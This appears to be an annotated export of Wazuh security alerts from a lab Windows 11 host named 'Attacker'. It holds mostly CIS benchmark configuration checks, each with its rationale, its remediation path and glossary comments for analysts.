data.win.system.eventID: 8198 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:31.1240683Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2428 Incremental log record number – handy for timeline order.
data.win.system.processID: 4516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "License Activation (slui.exe) failed with the following error code:
hr=0x80004005
Command-line arguments:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.8.28.3'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2469515 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26257 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting prevents connected users from being enumerated on domain-joined computers. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: A malicious user could use this feature to gather account names of other users, that information could then be used in conjunction with other types of attacks such as guessing passwords or social engineering. The value of this countermeasure is small because a user with domain credentials could gather the same account information using other methods. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\System\Logon\Do not enumerate connected users on domain-joined computers. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Logon.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.8.28.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off app notifications on the lock screen' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.8.28.5'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2473013 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26259 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off app notifications on the lock screen' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to prevent app notifications from appearing on the lock screen. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: App notifications might display sensitive business or personal data. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\System\Logon\Turn off app notifications on the lock screen. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Logon.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.8.28.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off picture password sign-in' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '8.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.8.28.6'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2475885 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26260 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off picture password sign-in' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to control whether a domain user can sign in using a picture password. The recommended state for this setting is: Enabled. Note: If the picture password feature is permitted, the user's domain password is cached in the system vault when using it. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Picture passwords bypass the requirement for a typed complex password. In a shared work environment, a simple shoulder surf where someone observed the on-screen gestures would allow that person to gain access to the system without the need to know the complex password. Vertical monitor screens with an image are much more visible at a distance than horizontal key strokes, increasing the likelihood of a successful observation of the mouse gestures. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\System\Logon\Turn off picture password sign-in. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CredentialProviders.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.8.28.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 8.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '8.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.8.34.6.2'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2479733 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26265 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to control the network connectivity state in standby on modern standby-capable systems. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Disabling this setting ensures that the computer will not be accessible to attackers over a WLAN network while left unattended, plugged in and in a sleep state. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\System\Power Management\Sleep Settings\Allow network connectivity during connected-standby (plugged in). Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Power.admx/adml that is included with the Microsoft Windows 10 Release 1607 & Server 2016 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.8.34.6.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 8.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Power\\PowerSettings\\f15576e8-98b7-4186-b944-eafa664402d9'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable Windows NTP Server' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.4'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.8'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.8.53.1.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.4'] CIS Critical Security Controls (CIS CSC) mapping – the safeguard‑level view of the benchmark item.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2483175 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26276 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Enable Windows NTP Server' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to specify whether the Windows NTP Server is enabled. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The configuration of proper time synchronization is critically important in an enterprise managed environment both due to the sensitivity of Kerberos authentication timestamps and also to ensure accurate security logging. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\System\Windows Time Service\Time Providers\Enable Windows NTP Server. Note: This Group Policy path is provided by the Group Policy template W32Time.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.8.53.1.2 CIS benchmark control number this check implements – should match rule.cis on the same alert.
data.sca.check.compliance.cis_csc: 8.4 CIS Critical Security Controls (CIS CSC) safeguard the check maps to.
data.sca.check.compliance.pci_dss: 10.4 PCI DSS requirement the check supports – pairs with rule.pci_dss.
data.sca.check.compliance.nist_800_53: AU.8 NIST SP 800‑53 control the check supports – pairs with rule.nist_800_53.
data.sca.check.compliance.tsc: CC7.2 AICPA Trust Services Criteria (SOC 2) control the check maps to.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\W32Time\\TimeProviders\\NtpServer'] Registry key(s) the check reads to decide pass/fail – the place to verify a fix by hand.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.6.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['2.5'] CIS Critical Security Controls (CIS CSC) mapping – the safeguard‑level view of the benchmark item.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2486361 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26281 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether Microsoft Store apps with Windows Runtime API access directly from web content can be launched. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Blocking apps from the web with direct access to the Windows API can prevent malicious apps from being run on a system. Only system administrators should be installing approved applications. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\App runtime\Block launching Universal Windows apps with Windows Runtime API access from hosted content. Note: A reboot may be required after the setting is applied. Note #2: This Group Policy path may not exist by default. It is provided by the Group Policy template AppXRuntime.admx/adml that is included with the Microsoft Windows 10 RTM (Release 1507) Administrative Templates (or newer). Note #3: In older Microsoft Windows Administrative Templates, this setting was initially named Block launching Windows Store apps with Windows Runtime API access from hosted content., but it was renamed starting with the Windows 10 Release 1803 Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.6.2 CIS benchmark control number this check implements – should match rule.cis on the same alert.
data.sca.check.compliance.cis_csc: 2.5 CIS Critical Security Controls (CIS CSC) safeguard the check maps to.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'] Registry key(s) the check reads to decide pass/fail – the place to verify a fix by hand.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disallow Autoplay for non-volume devices' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.4'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.8.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.3'] CIS Critical Security Controls (CIS CSC) mapping – the safeguard‑level view of the benchmark item.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2490499 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26282 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Disallow Autoplay for non-volume devices' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting disallows AutoPlay for MTP devices like cameras or phones. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: An attacker could use this feature to launch a program to damage a client computer or data on the computer. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\AutoPlay Policies\Disallow Autoplay for non-volume devices. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template AutoPlay.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.8.1 CIS benchmark control number this check implements – should match rule.cis on the same alert.
data.sca.check.compliance.cis_csc: 10.3 CIS Critical Security Controls (CIS CSC) safeguard the check maps to.
data.sca.check.compliance.pci_dss: 2.2.4 PCI DSS requirement the check supports – pairs with rule.pci_dss.
data.sca.check.compliance.nist_800_53: CM.1 NIST SP 800‑53 control the check supports – pairs with rule.nist_800_53.
data.sca.check.compliance.tsc: CC5.2 AICPA Trust Services Criteria (SOC 2) control the check maps to.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer'] Registry key(s) the check reads to decide pass/fail – the place to verify a fix by hand.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.4'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.8.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.3'] CIS Critical Security Controls (CIS CSC) mapping – the safeguard‑level view of the benchmark item.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2493544 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26283 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting sets the default behavior for Autorun commands. Autorun commands are generally stored in autorun.inf files. They often launch the installation program or other routines. The recommended state for this setting is: Enabled: Do not execute any autorun commands. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Prior to Windows Vista, when media containing an autorun command is inserted, the system will automatically execute the program without user intervention. This creates a major security concern as code may be executed without user's knowledge. The default behavior starting with Windows Vista is to prompt the user whether autorun command is to be run. The autorun command is represented as a handler in the Autoplay dialog. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Do not execute any autorun commands: Computer Configuration\Policies\Administrative Templates\Windows Components\AutoPlay Policies\Set the default behavior for AutoRun. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template AutoPlay.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.8.2 CIS benchmark control number this check implements – should match rule.cis on the same alert.
data.sca.check.compliance.cis_csc: 10.3 CIS Critical Security Controls (CIS CSC) safeguard the check maps to.
data.sca.check.compliance.pci_dss: 2.2.4 PCI DSS requirement the check supports – pairs with rule.pci_dss.
data.sca.check.compliance.nist_800_53: CM.1 NIST SP 800‑53 control the check supports – pairs with rule.nist_800_53.
data.sca.check.compliance.tsc: CC5.2 AICPA Trust Services Criteria (SOC 2) control the check maps to.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer'] Registry key(s) the check reads to decide pass/fail – the place to verify a fix by hand.
